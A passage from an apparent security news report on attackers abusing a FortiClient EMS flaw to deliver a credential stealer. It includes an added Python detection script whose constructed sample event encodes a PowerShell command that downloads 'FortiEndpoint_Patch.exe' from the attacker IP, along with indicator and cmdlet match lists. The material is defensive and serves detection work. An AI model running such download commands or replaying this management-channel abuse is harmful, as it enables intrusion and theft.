Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

https://thehackernews.com/2026/05/threat-actors-exploit-critical.html

Publish Date: 2026-05-28 11:26:00

Source Domain: thehackernews.com

Ravie Lakshmanan | May 28, 2026 | Vulnerability / Endpoint Security

Threat actors are continuing to exploit a critical, now-patched security flaw impacting FortiClient Endpoint Management Server (EMS) deployments to deliver credential-stealing malware.

“The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential stealer payload as a Fortinet endpoint update, silently executing the malicious executable through PowerShell.”

The activity, observed by the cybersecurity company in May 2026, involves the exploitation of CVE-2026-35616 (CVSS score: 9.1), a critical pre-authentication API access bypass leading to privilege escalation. The issue was addressed by Fortinet in FortiClient EMS 7.4.7 and later.

A successful compromise is followed by the threat actor taking steps to modify configurations to defer firmware upgrade reminders, as well as modifying a Remote Access Profile configuration and endpoint policy to insert a malicious script for execution on endpoint devices.

“The observed execution pattern suggests that threat actors used FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations,” Arctic Wolf said.

“Once the threat actors had a route to modify EMS-managed configuration, every managed endpoint became a potential execution target without requiring a separate intrusion path to each device.”

In addition, the attack has been found to leverage “fortitray.exe,” a legitimate executable associated with FortiClient, to launch a .cmd script file using “cmd.exe.” The .cmd script is designed to invoke a Base64-encoded PowerShell script that, in turn, is responsible for downloading a malicious payload, running it, and exfiltrating the results to “83.138.53[.]110” via an HTTP POST request.
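The execution chain above (fortitray.exe launching cmd.exe with a .cmd script, which in turn runs Base64-encoded PowerShell) is what a defender would hunt for in process-creation telemetry. The following is an added triage example, not code from the article or from Arctic Wolf. The event layout (dicts with `parent_image`, `image`, `command_line`) and the sample events are constructed; the decoded script in sample event 2 is a stand-in that only references the indicators named in the write-up (the de-fanged address, the `FortiEndpoint_Patch.exe` name, and a download cmdlet), and the file paths in the samples are placeholders.

```python
"""Triage process-creation events for the FortiClient EMS abuse chain.

Added illustrative code (not the article's or Arctic Wolf's). Event format and
sample events are constructed; the indicators come from the write-up.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Indicators from the article. The IP is de-fanged there ("83.138.53[.]110");
# it is re-fanged here so it can be matched against decoded script text.
KNOWN_C2 = "83.138.53.110"
PAYLOAD_NAME = "fortiendpoint_patch.exe"
DOWNLOAD_CMDLETS = ("invoke-webrequest", "invoke-restmethod", "downloadstring")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CMD_SCRIPT = re.compile(r"\.cmd\b", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then Base64).
    Used here only to build constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_events(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Return (event id, severity, reason) for events matching the chain."""
    findings = []
    for ev in events:
        parent, image, cmd = _basename(ev["parent_image"]), _basename(ev["image"]), ev["command_line"]

        # Stage 1: the FortiClient tray process launching cmd.exe on a .cmd script.
        if parent == "fortitray.exe" and image == "cmd.exe" and CMD_SCRIPT.search(cmd):
            findings.append((ev["id"], "high", "fortitray.exe launched cmd.exe with a .cmd script"))

        # Stage 2: encoded PowerShell; decode it and look for the known indicators.
        if image in ("powershell.exe", "pwsh.exe"):
            script = decode_encoded_command(cmd)
            if script is None:
                continue
            text = script.lower()
            hits = [i for i in (KNOWN_C2, PAYLOAD_NAME, *DOWNLOAD_CMDLETS) if i in text]
            if hits:
                findings.append((ev["id"], "critical", "encoded PowerShell references " + ", ".join(hits)))
            else:
                findings.append((ev["id"], "medium", "encoded PowerShell command (decode and review)"))
    return findings


# Constructed sample script: references the article's indicators, nothing more.
SAMPLE_SCRIPT = "Invoke-WebRequest 'http://83.138.53.110/' -OutFile 'FortiEndpoint_Patch.exe'"

# Constructed sample events (paths are placeholders, not from the article).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "C:\Users\Public\update.cmd"'},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -enc " + encode_for_powershell(SAMPLE_SCRIPT)},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",  # benign encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date")},
    {"id": 4, "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe",  # normal child
     "command_line": "FortiClient.exe"},
]

if __name__ == "__main__":
    for event_id, severity, reason in analyze_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}: {reason}")
```

The medium finding on event 3 is deliberate: an encoded command with no known indicator is not proof of compromise, but in an environment where FortiClient EMS pushes scripts, every encoded PowerShell launch from the management pathway deserves a decode-and-review step rather than a silent pass.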

The executable, named “FortiEndpoint_Patch.exe,” masquerades as an update,…
